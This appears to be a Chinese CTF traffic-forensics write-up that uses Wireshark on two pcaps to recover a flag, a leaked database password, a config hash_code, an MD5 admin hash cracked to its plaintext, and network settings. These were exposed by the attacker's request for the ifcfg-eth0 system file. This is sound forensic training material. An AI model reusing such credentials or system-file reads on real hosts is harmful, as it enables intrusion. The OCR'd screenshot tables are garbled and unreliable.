🚄 Wireshark · 追踪 TCP 流 (tcp.stream eq 181) · webone.pcap  $\times$ GET /robots.txt HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Host: 192.168.32.189 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: \*/\* HTTP/1.1 200 OK Date: Wed, 08 Aug 2018 07:23:28 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Fri, 25 Nov 2016 21:18:26 GMT ETag: "1f0-11b-54226a9a90482" Accept-Ranges: bytes Content-Length: 283 Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: \* Disallow: /admin/ Disallow: /cache/ Disallow: /data/ Disallow: /include/ Disallow: /install/ Disallow: /languages/ Disallow: /m/include/ Disallow: /m/theme/ Disallow: /theme/ Disallow: /upgrade/ Disallow: /captcha.php flag:87b7cb79481f317bde90c116cf36084b 1 客户端 分组, 1 服务器 分组, 1 turn(s). 整个对话(833 bytes) +  $\sim$ 显示和保存数据为 ASCII ~ 流 181 查找下一个(N) 查找: 滤掉此流 打印 返回 Save as... CSDM @Johhny.G

从上图得知flag为: 87b7cb79481f317bde90c116cf36084b

同时可以直接导出http对象,在文本过滤器中选择robots.txt,随便选取一个将文件保存下来

| Wires  | shark · 导出 · HT | TP 对象列表    |           |                 | -     |       | ×    |
|--------|-----------------|------------|-----------|-----------------|-------|-------|------|
| 分组     | 主机名             | 内容类型       | 大小        | 文件名             |       |       |      |
| 4068   | 192.168.32.189  | text/plain | 283 bytes | robots.txt      |       |       |      |
| 439045 | evilhostjNLA    | text/plain | 283 bytes | robots.txt      |       |       |      |
| 439135 | 192.168.32.1    | text/plain | 283 bytes | robots.txt      |       |       |      |
| 439181 | evilhostlvqd    | text/plain | 283 bytes | robots.txt      |       |       |      |
| 439232 | evilhostvb2f    | text/plain | 283 bytes | robots.txt      |       |       |      |
| 647041 | 192.168.32.189  | text/plain | 283 bytes | robots.txt      |       |       |      |
|        |                 |            |           |                 |       |       |      |
| 文本过滤   | 器: robots.txt   |            |           |                 |       |       |      |
|        |                 |            |           | Save Save All C | SDM @ | Johne | y. G |

| 🥘 robots.txt - 记事本                    |                    |                        | _    |      | ×      |
|---------------------------------------|--------------------|------------------------|------|------|--------|
| 文件(F) 编辑(E) 格式(O) 查看(V) 帮助(H)         |                    |                        |      |      |        |
| User-agent: *                         |                    |                        |      |      | $\sim$ |
| Disallow: /admin/                     |                    |                        |      |      |        |
| Disallow: /cache/                     |                    |                        |      |      |        |
| Disallow: /data/                      |                    |                        |      |      |        |
| Disallow: /include/                   |                    |                        |      |      |        |
| Disallow: /install/                   |                    |                        |      |      |        |
| Disallow: /languages/                 |                    |                        |      |      |        |
| Disallow: /m/include/                 |                    |                        |      |      |        |
| Disallow: /m/theme/                   |                    |                        |      |      |        |
| Disallow: /theme/                     |                    |                        |      |      |        |
| Disallow: /upgrade/                   |                    |                        |      |      |        |
| Disallow: /captcha.php                |                    |                        |      |      |        |
| flag:87b7cb79481f317bde90c116cf36084b |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      |        |
|                                       |                    |                        |      |      | $\sim$ |
| <                                     | 第1行 第1列            | 100% Windows (CRLP)    | N @J | ohnn | y.Ĝ    |
|                                       | 345 1 1 1 345 1 71 | TOO TO WINDOWS (CITEF) | 0114 | 0    |        |

# 6、黑客找到的数据库密码

根据一些大师的经验,数据库通常的关键字有 database 、 db 、 data 等等,可以通过过滤关键字搜寻相关流量。

- o ×

| No. Tim     | ne -      | Source                                      | Bestination                                | Protocol  | Length Info           |                 |  |  |                |               |                |
|-------------|-----------|---------------------------------------------|--------------------------------------------|-----------|-----------------------|-----------------|--|--|----------------|---------------|----------------|
| 73 619      | 97.700    | 192.168.32.189                              | 192.168.94.59                              | HTTP      | 1341 HTTP/1.1 200 OK  | (text/html)     |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
| > Enomo 7   | 34501. 1  | 241 hutor on ulno                           | (10700 bits) 1241 b                        | utos con  | tuned (10728 bits)    |                 |  |  |                |               |                |
| > Traine 7. | + TT C-   | ISMI Dyces on wire                          | (10/20 0103), 1541 (                       | Dom U     | cureu (10/20 bits)    | (0, (2, 20, 42, |  |  |                |               |                |
| > cthernet  | t 11, Sr  | <pre>'C: Vmware_CD:9T:05</pre>              | (00:00:29:00:97:05)                        | i, UST: H | angzhou_59:42:ed (b0: | 79:05:59:42:ed) |  |  |                |               |                |
| > Internet  | t Protoc  | iol Version 4, Src:                         | 192.168.32.189, DS1                        | :: 192.16 | 8.94.59               |                 |  |  |                |               |                |
| > Transmis  | ssion Co  | ontrol Protocol, Sr                         | c Port: 80, Dst Port                       | :: 13342, | Seq: 1, ACK: 621, Let | 1: 1287         |  |  |                |               |                |
| > Hyperte:  | xt Irans  | fer Protocol                                |                                            |           |                       |                 |  |  |                |               |                |
| > Line-bas  | sed text  | : data: text/html (                         | 42 lines)                                  |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
|             |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
| 0000 10     |           |                                             |                                            |           |                       |                 |  |  |                |               |                |
| 0000 60     | 19 63 39  | 942 ed 00 0c 29 c                           | 5 91 85 08 00 45 00                        | ··· c98·  | ···)····E·            |                 |  |  |                |               | ^              |
| 0010 05     | 21 24 05  | 9 40 00 40 06 11 7                          | 7 C0 a8 20 D0 C0 a8                        | ·/>·@·    | (g) · · W · · · · ·   |                 |  |  |                |               |                |
| 0020 Se     | 7- 05 64  | 0 04 10 04 05 aD 9                          | 0 C5 15 Z8 EZ 50 18                        | 1,194     | UT TD (1 4 3          |                 |  |  |                |               |                |
| 0050 00     | 20 20 44  | 5 46 00 46 54 54 5<br>5 46 00 00 46 54 54 5 | 0 ZT DI ZE DI ZO DZ                        | 00 OK     | D attas Mad           |                 |  |  |                |               |                |
| 0050 30     | 20 20 41  | 2 20 41 75 67 20 2                          | 4 03 34 20 37 03 04<br>2 30 31 30 30 30 30 | 00 00     | -D ate: weu           |                 |  |  |                |               |                |
| 0050 20     | 20 30 30  | 20 20 20 20 20 20 20 20 20 20 20 20 20 2    | 4 04 02 53 65 73 76                        | , 10.00   | C MT Samu             |                 |  |  |                |               |                |
| 0000 54     | 72 20 20  | 3 30 33 20 47 40 3<br>3 41 70 61 63 69 6    | 4 00 0a 33 03 72 70                        | .10.05    | a ha/2 2 1            |                 |  |  |                |               |                |
| 0070 05     | 20 28 43  | 3 65 60 74 AF 53 2                          | 0 0d 0a 58 3d 50 6f                        | 5 (Con    | +0 S). Y-Po           |                 |  |  |                |               |                |
| 0000 33     | 65 72 65  | 5 6/ 2 d / 2 79 3 a 2                       | 0 50 /8 50 24 35 24                        | wered-    | By PHP/5              |                 |  |  |                |               |                |
| 00-0 34     | 20 34 35  | 04 0a 43 6f 6e 7                            | 4 65 6e 74 2d 4c 65                        | 4 45      | Content-le            |                 |  |  |                |               |                |
| 00b0 6e     | 67 74 68  | 3 3 a 20 31 30 39 3                         | 2 0d 0a 43 6f 6e 6e                        | ngth:     | 10 92 - Conn          |                 |  |  |                |               |                |
| 0000 65     | 63 74 69  | 9 6f 6e 3a 20 63 6                          | c 6f 73 65 0d 0a 43                        | ection    | : closeC              |                 |  |  |                |               |                |
| 00d0 6f     | 6e 74 65  | 5 6e 74 2d 54 79 7                          | 0 65 3a 20 74 65 78                        | ontent    | -T vpe: tex           |                 |  |  |                |               |                |
| 00e0 74     | 2f 68 74  | 1 6d 6c 3b 20 63 6                          | 8 61 72 73 65 74 3d                        | t/html    | ; charset=            |                 |  |  |                |               |                |
| 00-00 55    | 54 46 20  | 1 38 0d 0a 0d 0a 2                          | d 3e 7c 3c 3f 70 68                        | UTF-8     | ····>                 |                 |  |  |                |               |                |
| 0100 70     | 0a 2f 2a  | a 2a 0a 20 2a 20 4                          | 4 6f 75 50 48 50 0a                        | p./**.    | * DouPHP              |                 |  |  |                |               |                |
| 🔵 🏹 weba    | one, pcap |                                             |                                            |           |                       |                 |  |  | 分组: 736029 · i | 円昇示: 1 (0.0%) | CSDN @Johnny.G |
|             |           |                                             |                                            |           |                       |                 |  |  | 10 mar         |               | in the second  |

通过追踪TCP流。

| 🚄 Wireshark · 追踪 TCP 流 (tcp.stream eq 71893) · webone.pcap     | -   |         | ×   |
|----------------------------------------------------------------|-----|---------|-----|
| *http://www.douco.com/license.html<br>*                        |     |         | ^   |
| <pre>* Author: DouCo * Release Date: 2015-06-10 */</pre>       |     |         |     |
| // database host<br>\$dbhost = "10.3.3.101";                   |     |         |     |
| // database name<br>\$dbname = "web";                          |     |         |     |
| // database username<br>\$dbuser = "web";                      |     |         |     |
| // database password<br>\$dbpass = "e667jUPvJjXHvEUv";         |     |         |     |
| // table prefix<br>\$prefix = "dou_";                          |     |         |     |
| <pre>// charset define('DOU_CHARSET','utf-8');</pre>           |     |         |     |
| <pre>// administrator path define('ADMIN_PATH','admin');</pre> |     |         |     |
| <pre>// mobile path define('M_PATH','m');</pre>                |     |         |     |
| ?><br> <-                                                      |     |         | ~   |
| <i>I 客户端 分组, I 服务器 分组, I turn (s).</i><br>整个对话(1907 bytes) マ   | ~   | 流 71893 |     |
| 查找:                                                            |     |         | (N) |
| 滤掉此流 打印 Save as… 返回 CSD                                        | N @ | ohmen   | .G  |

得出账号为: web
得出密码为: e667jUPvJjXHvEUv
(注:密码就是这个,没有加密!!!)
得出IP地址为: 10.3.3.101

# 7、黑客在数据库中找到的hash\_code

由于上题最后查询出有关数据库的流量仅有一个,因此决定从webtwo流量包入手。 根据题目决定先利用 hash\_code 这个关键字进行过滤。

| 🥻 webtwo.pcap                                               | -                                          |
|-------------------------------------------------------------|--------------------------------------------|
| 文件(F) 編輯(E) 视問(V) 説明(G) 播発(C) 分析(A) 統計(S) 电法(V) 上周(T) 報知(H) |                                            |
| http contains "hash_code"                                   | ◎                                          |
| No. Time Source Destination Protocol Length Info            |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
|                                                             |                                            |
| 🔘 🝸 webtwo. pcap                                            | 分组: 591899 - 已显示: 0 (0.0%) CSDN @Jobn King |
|                                                             |                                            |

....

查询不出流量。此时想到 hash\_code 是和数据库有关的,通过上题得知数据库的Ⅳ地址是 10.3.3.101,决定通过过滤 IP 看看是 否可以过滤出相关流量。

ip.src==10.3.3.101

| 🚄 webtwo.pcap        |                 |                                                |             |                                                                                                    | – 🗗 🗙          |
|----------------------|-----------------|------------------------------------------------|-------------|----------------------------------------------------------------------------------------------------|----------------|
| 文件(F) 编辑(E) 视        | 2图(V) 跳转(G) 捕菇  | 토(C) 分析(A) 统计(S) 电谐                            | 舌(Y) 无线(W)  | 工具(T) 帮助(H)                                                                                                    |                |
| A = 2 • -            | ि 🔀 🖾 🔍 👳       | * 🕾 Ŧ 🛓 🗖 🗖 Q                                  | Q, Q, 🎹     |                                                                                                    |                |
| ip. sro=10. 3. 3. 10 | 1               |                                                |             |                                                                                                    | 🗶 🗔 💌 表达式… 🛛 + |
| No. Time             | Source          | Bestination                                    | Protocol    | Length Info                                                                                                    | -              |
| 2 0.000290           | 10.3.3.101      | 10.3.3.100                                     | TCP         | 74 3306 → 38975 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=603950418 TSecr=68845013 WS=128 | _              |
| 4 0.001376           | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 144 Server Greeting proto=10 version=5.5.49                                                                       |                |
| 7 0.001849           | 10.3.3.101      | 10.3.3.100                                     | TCP         | 66 3306 → 38975 [ACK] Seq=79 Ack=84 Win=14592 Len=0 TSval=603950420 TSecr=68845015                                |                |
| 8 0.001860           | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 77 Response OK                                                                                                    |                |
| 10 0.002287          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 75 Response                                                                                                    |                |
| 12 0.002856          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 77 Response OK                                                                                                    |                |
| 14 0.003188          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 77 Response OK                                                                                                    |                |
| 16 0.003569          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 77 Response OK                                                                                                    |                |
| 18 0.004348          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 185 Response                                                                                                    |                |
| 20 0.005074          | 10.3.3.101      | 10.3.3.100                                     | MySQL       | 595 Response                                                                                                    |                |
| 23 0.005571          | 10.3.3.101      | 10.3.3.100                                     | TCP         | 66 3306 → 38975 [FIN, ACK] Seq=780 Ack=332 Win=14592 Len=0 TSval=603950423 TSecr=68845018                         |                |
| > Enamo 2: 74 k      | wtor on wine (F | 92 hits) 74 hytos sa                           | ntuned (592 | 24 SARE SARE POUL APPLE A A LA UP AARAA LA MEE APPA FARE APA FARE A PARAANA TE SARAPANNE E FAREFAN DE ARA         |                |
| > Frame 2. 74 c      | Spc: Vmware 1d: | 92 DICS), 74 Dyces ca<br>96.01 (00.0c.29.1d.96 | -01) Det 1  | 01(5)<br>//mana ch:9f:8f (00:0c:79:ch:9f:8f)                                                                      |                |
| > Internet Prot      | ocol Version A  | Spc: 10 3 3 101 Det                            | 10 3 3 10   | a                                                                                                    |                |
| > Transmission       | Control Protoco | 1. Src Port: 3306. Ds                          | t Port: 389 | 75. Sea: 0. Ack: 1. Len: 0                                                                                        |                |
|                      |                 | -,,                                            |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
|                      |                 |                                                |             |                                                                                                    |                |
| 0000 00 0c 29        | cb 9f 8f 00 0c  | 29 1d 96 01 08 00 49                           | i 00 ···)·· | ··· )····E·                                                                                                    |                |
| 0010 00 3c 00        | 00 40 00 40 06  | 1f ee 0a 03 03 65 0a                           | 03          | .@· ····e·                                                                                                    |                |
| 0020 03 64 0c        | ea 98 3f 87 15  | 9e 05 65 af e0 4e a0                           | )12 ·d···   | 2eN                                                                                                    |                |
| 0030 38 90 b1        | 0d 00 00 02 04  | 05 b4 04 02 08 0a 23                           | 3 ff 8      | ····#·                                                                                                    |                |
| 0040 8d 52 04        | 1a 7d d5 01 03  | A3 A7                                          | .R3         |                                                                                                    |                |

🔴 🎽 webtwo. pcsp

选取第一个流量进行追踪TCP流。

| Wireshark · 追踪 TCP 流 (tcp.stream eq 0) · webtwo.pcap                                                                                                    | — [                                                                                       | ) X                            |
|----------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------|--------------------------------|
| J<br>5.5.49GM <sup>^5</sup> /<br>({Utj8.mysql_native_password.0@<br>.v.X. %. #mysql_native_password.<br>.character_set_connection=utf8, character_set_results=utf8,<br>character_set_client=binarySET<br>sql_mode=''web8SELECT value H<br>WHERE name = 'hash_code'7def.web<br>dou_config<br>dou_config value.value.! | web.<br>S<br>FROM `dou_<br>`dou_admin<br>dou_admin<br>dou_admin<br>dou_admin<br>dou_admin | .K.a).&<br>ET<br>config`<br>n` |
| 8 客庁満 分超, 8 服务器 分超, 15 turn(s).<br>整个で対话 (1109 hvtes) マロン 見示和保存数据为 ASCI                                                                                                    | 口 🗸 流                                                                                     | 0                              |
|                                                                                                    |                                                                                           | 下一个(N)                         |
| 源掉此流 打印 Save as <sup>…</sup> 返回 C                                                                                                    | SDN QJO                                                                                   | n řefey. G                     |

|| 分组: 581809 · 已显示: 256855 (44.1%) CSDN @ Official t

通过比对信息,得出hash\_code为: d1c029893df40cb0f47bcf8f1c3c17ac

8、黑客破解账号ijnu@test.com得到的密码

#### 根据题目决定利用 ijnu@test.com 这个关键字进行分组详情查询。

| webtwo.pcap                                                                                                    |                                   | -      | o ×                                                                                                    |
|----------------------------------------------------------------------------------------------------|-----------------------------------|--------|----------------------------------------------------------------------------------------------------|
|                                                                                                    |                                   |        |                                                                                                    |
|                                                                                                    |                                   |        |                                                                                                    |
|                                                                                                    |                                   |        | 表达式… +                                                                                                    |
| →<br>分組連構 ~ 克存 ~ ☑ 区分大小写 字符串 ~ ijnufftett.com                                                                                                    |                                   | 査找     | 取消                                                                                                    |
| No. Time Source Destination Protocol Length Info                                                                                                    |                                   |        | ^                                                                                                    |
| 1145 2987.205 10.3.3.100 10.3.3.101 MySQL 126 Request Query                                                                                                    |                                   |        |                                                                                                    |
| 1145_ 2987.206_ 10.3.3.101 10.3.3.100 MySQL 185 Response                                                                                                    |                                   |        |                                                                                                    |
| 1145_ 2987.206_ 10.3.3.100 10.3.3.101 MySQL 97 Request Query                                                                                                    |                                   |        |                                                                                                    |
| 1145_2987.206_10.3.3.100110.3.3.1001MySQL 2606 Response                                                                                                    |                                   |        |                                                                                                    |
| 1145_2207.200_10.3.3.10010.3.3.10110/0 00 414314 3000 [MKG] 24(3-00 MK-2/31 WII-1/300 [201-0 13041-/1052220 13021-00053/020                                                                                                    |                                   |        |                                                                                                    |
| 1145_2987.288_10.3.3.101 10.3.3.100 M/SQL 492 Response                                                                                                    |                                   |        |                                                                                                    |
| 1145 2987.209 10.3.3.100 10.3.3.101 MySQL 145 Request Query                                                                                                    |                                   |        |                                                                                                    |
| 1145 2987.209 10.3.3.101 10.3.3.100 MySQL 492 Response                                                                                                    |                                   |        |                                                                                                    |
| ↓ 1145_ 2987.209_ 10.3.3.100 10.3.3.101 MySQL 160 Request Query                                                                                                    |                                   |        |                                                                                                    |
| 1145_ 2987.209_ 10.3.3.101 10.3.3.100 MySQL 1516 Response                                                                                                    |                                   |        | ~                                                                                                    |
| text: 357\277\275\357\277\275\ |                                   |        |                                                                                                    |
| text: 19<br>text: \357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275\357\277\275<br>text: jnu@test.com<br>text: <u>D36f5as61806f07def6e839121a22ec</u><br>text: ADNIN<br>text: 1530779719                                                                                                    |                                   |        | , in the second second se |
| 064a0       99       99       93       95       36       66       60       66       76       77       74       2e      ij nuĝtest.         04b0       63       66       20       27       36       63       66       36       66       36       66       35       61       35       31       53       33       39       31       32       16       67       67       37       74       2e        Com D78       Saael66       0       0       0       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44       44<                                                                                                    |                                   |        | Â                                                                                                    |
| ● 7 Field ray market text (aveal ray text), 13 空帯                                                                                                    | 分組: 581809 ・ 己辰示: 581809 (100.0%) | CSDN @ | att Default                                                                                                    |

得出对应密码有可能是通过MD5加密过的,对应加密后的密码是: b78f5aa6e1606f07def6e839121a22ec 通过网上的MD5解密

|     | 输入让你无语的MD5                    |                |
|-----|-------------------------------|----------------|
| b78 | f5aa6e1606f07def6e839121a22ec | 解密             |
|     | md5                           |                |
|     | edc123!@#                     |                |
|     |                               | CSDN @Johnny.G |

#### 最后得出对应的密码是: edc123!@#

### 9、黑客攻击的web服务器的网卡配置和网卡内网IP

先回到webone.pcap流量包进行查询,根据一些大师的经验,网卡通常的关键字有 eth0 、 ens33 等,可以分别尝试通过关键字 过滤查询。

先尝试 eth0。

http contains "eth0"

| No. Time Source Pertination Protocol Length Info                                                                                                    |                          |                |
|----------------------------------------------------------------------------------------------------|--------------------------|----------------|
| /128 4915.432 192.168 192.168 HIP 224 [ICP AcKed unseen segment] [ICP Previous segment not captured] GET /etc/syscontig/network-scripts/itctg-etn0 HI | P/1.1                    |                |
| -/34/ 6292.403 192.168 192.168 HTP 249 HTP/1.1 200 0K (text/html)                                                                                     |                          |                |
| /348_ 6338.21/_ 192.168 192.168 HIIP 249 HIIP/1.1 200 0K (text/ntml)                                                                                  |                          |                |
| > Frame 734790: 249 bytes on wire (1992 bits), 249 bytes captured (1992 bits)                                                                         |                          |                |
| Ethernet II, Src: Vmware_cb:9f:85 (00:0c:29:cb:9f:85), Dst: Hangzhou_39:42:ed (b0:f9:63:39:42:ed)                                                     |                          |                |
| > Internet Protocol Version 4, Src: 192.168.32.189, Dst: 192.168.94.59                                                                                |                          |                |
| > Transmission Control Protocol, Src Port: 80, Dst Port: 13523, Seq: 1461, Ack: 863, Len: 195                                                         |                          |                |
| > [2 Reassembled TCP Segments (1655 bytes): #734789(1460), #734790(195)]                                                                              |                          |                |
| > Hypertext Transfer Protocol                                                                                                    |                          |                |
| ✓ Line-based text data: text/html (31 lines)                                                                                                    |                          |                |
| -> eth0 Link encap:Ethernet HWaddr 00:0C:29:CB:9F:85 \n                                                                                               |                          |                |
| inet addr:192.168.32.189 Bcast:192.168.32.255 Mask:255.255.0\n                                                                                        |                          |                |
| inet6 addr: fe80::20c:29ff:fecb:9f85/64 Scope:Link\n                                                                                                  |                          |                |
| UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1/n                                                                                                    |                          |                |
| RX packets:1599038 errors:0 dropped:0 overruns:0 frame:0\n                                                                                            |                          |                |
| TY parkets 2032856 enones 0 dopped 0 oversing 0 carrier 0) n                                                                                          |                          |                |
| collisions: 0 typical 100 to a topical over and to a                                                                                                  |                          |                |
| PV hyter://6/16230 (/6/ 3 MB) TV hyter:/10/1935/70 (003 5 MB))n                                                                                       |                          |                |
| \\                                                                                                    |                          |                |
|                                                                                                    |                          |                |
| etni Link encapittnernet mwadar 00:00:22:00:34:66 (n                                                                                                  |                          |                |
| ineT addr:10.53.100. Krast:10.53.255 Mask:252.252.01                                                                                                  |                          |                |
|                                                                                                    |                          | ^              |
| 0010 00 eb /1 3/ 40 00 40 05 c8 8c c0 a8 20 bd c0 a8 · q/g·g·g·····                                                                                   |                          |                |
| 0020 5e 50 00 50 34 03 51 10 6/ 0e 80 /3 25 14 50 18 ^; P4 U g .5% P                                                                                  |                          |                |
|                                                                                                    |                          |                |
| 000 05 /2 /2 07 /2 /5 38 30 22 00 4 /2 07 /8 /0 05 04 errors: 0 aropped                                                                               |                          |                |
|                                                                                                    |                          |                |
| 0000 72 72 09 09 72 53 09 08 22 02 20 20 20 20 20 20 20 20 20 20 20                                                                                   |                          |                |
|                                                                                                    |                          |                |
| 0000 20 20 20 20 20 20 20 52 58 20 62 79 74 65 73 3a R X bytes:                                                                                       |                          |                |
| 00a0 32 31 35 30 38 32 20 28 32 31 30 2e 30 20 4b 69 215082 ( 210.0 Ki                                                                                |                          |                |
| 00b0 42 29 20 20 54 58 20 62 79 74 65 73 3a 32 31 35 B) TX b ytes:215                                                                                 |                          |                |
| 00c0 30 38 32 20 28 32 31 30 2e 30 20 4b 69 42 29 0a 082 (210 0 K1B)                                                                                  |                          |                |
| 00d0 0a 5b 53 5d 0a 2f 76 61 72 2f 77 77 77 2f 68 74[S] /va r/www/ht                                                                                  |                          |                |
| 00e0 6d 6c 2f 69 6d 61 67 65 73 2f 61 72 74 69 63 6c ml/image s/articl                                                                                |                          |                |
|                                                                                                    |                          | ~              |
| Frame (249 bytes) Reassembled TCF (1655 bytes)                                                                                                    |                          | CSDN @Johnny G |
| 2 waters near                                                                                                    | 公田・736029 ・ 司房元・3 (0.0%) |                |

通过上图可以看出,找到了几个有关的流量,选择服务器返回的流量(第二个/第三个流量),进行跟踪TCP流。

| 📕 Wireshar                                                          | k ∙追踪 TCP                                                                                  | 流 (tcp.strean                                                                                               | n eq 71902) ·                                                                                           | webon                                                                | e.pcap                                                          |                                                                                      |                                                              | -                                  |                | ×     |
|---------------------------------------------------------------------|--------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------|-----------------------------------------------------------------|--------------------------------------------------------------------------------------|--------------------------------------------------------------|------------------------------------|----------------|-------|
| Server: A<br>X-Powered<br>Content-<br>Connection<br>Content-        | Apache/2.<br>d-By: PHP<br>Length: 1<br>on: close<br>Type: tex                              | 2.15 (Cent<br>/5.4.45<br>460<br>t/html; ch                                                                  | :OS)<br>narset=UTF                                                                                      | -8                                                                   |                                                                 |                                                                                      |                                                              |                                    |                | ^     |
| -> eth0<br>255.255.                                                 | Link<br>inet ad<br>255.0<br>inet6 a<br>UP BROA<br>RX pack<br>TX pack<br>collisi<br>RX byte | encap:Eth<br>dr:192.168<br>ddr: fe80:<br>DCAST RUNN<br>ets:159903<br>ets:203285<br>ons:0 txqu<br>s:47642633 | ernet HW<br>3.32.189<br>1:20c:29ff<br>IING MULTI<br>38 errors:<br>36 errors:<br>39 (454.3 )             | addr (<br>Bcast<br>:fecb<br>CAST<br>0 drop<br>0 drop<br>00<br>MiB)   | 00:0C:<br>192.1<br>9f85/<br>MTU:1<br>oped:0<br>oped:0<br>TX by  | 29:CB:9F:<br>68.32.255<br>64 Scope:<br>500 Metr<br>overruns<br>overruns<br>tes:10418 | 85<br>Mask:<br>Link<br>ic:1<br>:0 fran<br>:0 carn<br>35470 ( | ne:0<br>rier:0<br>(993.5           | )<br>5 MiB)    |       |
| eth1                                                                | Link en<br>inet ad<br>inet6 a<br>UP BROA<br>RX pack<br>TX pack<br>collisi<br>RX byte       | cap:Etherr<br>dr:10.3.3<br>ddr: fe80:<br>DCAST RUNN<br>ets:117441<br>ets:103220<br>ons:0 txqu<br>s:83283597 | net HWadd<br>100 Bcas<br>220c:29ff<br>NING MULTI<br>6 errors:<br>02 errors:<br>02 errors:<br>02 (794.2) | r 00:0<br>t:10.3<br>:fecb:<br>CAST<br>0 drop<br>0 drop<br>00<br>MiB) | OC:29:<br>3.3.25<br>9f8f/<br>MTU:1<br>pped:0<br>pped:0<br>TX by | CB:9F:8F<br>5 Mask:2<br>64 Scope:<br>500 Metr<br>overruns<br>overruns<br>tes:10242   | 55.255<br>Link<br>ic:1<br>:0 fran<br>:0 carn<br>8452 (9      | .255.0<br>me:0<br>rier:0<br>97.6 M | )<br>)<br>11B) |       |
| 10                                                                  | Link en<br>inet ad<br>inet6 a<br>UP LOOP<br>RX pack<br>TX pack<br>collisi<br>RX byte       | cap:Local<br>dr:127.0.0<br>ddr: ::1/1<br>BACK RUNNI<br>ets:2066 e<br>ets:2066 e<br>ons:0 txqu<br>s:215082 ( | Loopback<br>).1 Mask:<br>L28 Scope:<br>ING MTU:6<br>errors:0 d<br>errors:0 d<br>weuelen:0<br>(210.0 KiB | 255.0<br>Host<br>5536<br>ropped<br>ropped                            | 0.0<br>Metri<br>1:0 ov<br>1:0 ov                                | c:1<br>erruns:0<br>erruns:0<br>:215082 (                                             | frame:(<br>carrie<br>210.0                                   | 0<br>^:0<br>(iB)                   |                |       |
| [S]<br>/ <u>var/www</u><br>2 <i>客户端 分组</i> ,<br>整个对话(2 <sup>4</sup> | <u>/html/im</u> a<br><i>2 服务器 分類</i><br>517 bytes)                                         | <mark>ges/artic</mark><br>, 1 turn(s).                                                                      | P                                                                                                    | ~                                                                    | 显示                                                              | 和保存数据为                                                                               | ASCII                                                        | ~ 3                                | <b>奈</b> 71902 | ~     |
| 查找:                                                                 |                                                                                            |                                                                                                    |                                                                                                    |                                                                      |                                                                 |                                                                                      |                                                              | 查                                  | 找下一个           | · (N) |
